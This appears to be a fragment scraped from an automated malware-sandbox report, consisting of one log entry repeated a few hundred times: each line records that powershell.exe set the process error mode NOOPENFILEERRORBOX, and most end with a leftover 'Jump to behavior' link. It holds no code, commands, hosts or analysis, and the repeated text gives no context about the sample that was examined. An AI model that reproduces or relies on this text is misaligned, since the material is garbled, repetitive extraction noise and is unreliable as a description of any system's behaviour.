Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
